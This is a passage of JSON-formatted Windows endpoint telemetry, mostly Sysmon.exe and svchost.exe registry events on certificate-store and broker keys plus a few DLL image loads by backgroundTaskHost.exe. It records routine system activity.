"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_value": "{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\BrokerId", - "registry_value": "BrokerId", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\EventParameters", - "registry_value": "EventParameters", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\Flags", - "registry_value": "Flags", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\PackageFullName", - "registry_value": "PackageFullName", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\UserSid", - "registry_value": "UserSid", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "image_load", - "image_name": "Windows.Storage.ApplicationData.dll", - "image_path": "C:\\Windows\\System32\\Windows.Storage.ApplicationData.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_value": "{894f95b7-467e-4aba-b832-df7be656ba28}", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\BrokerId", - "registry_value": "BrokerId", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\EventParameters", - "registry_value": "EventParameters", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\Flags", - "registry_value": "Flags", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\PackageFullName", - "registry_value": "PackageFullName", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\UserSid", - "registry_value": "UserSid", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "image_load", - "image_name": "logoncli.dll", - "image_path": "C:\\Windows\\System32\\logoncli.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 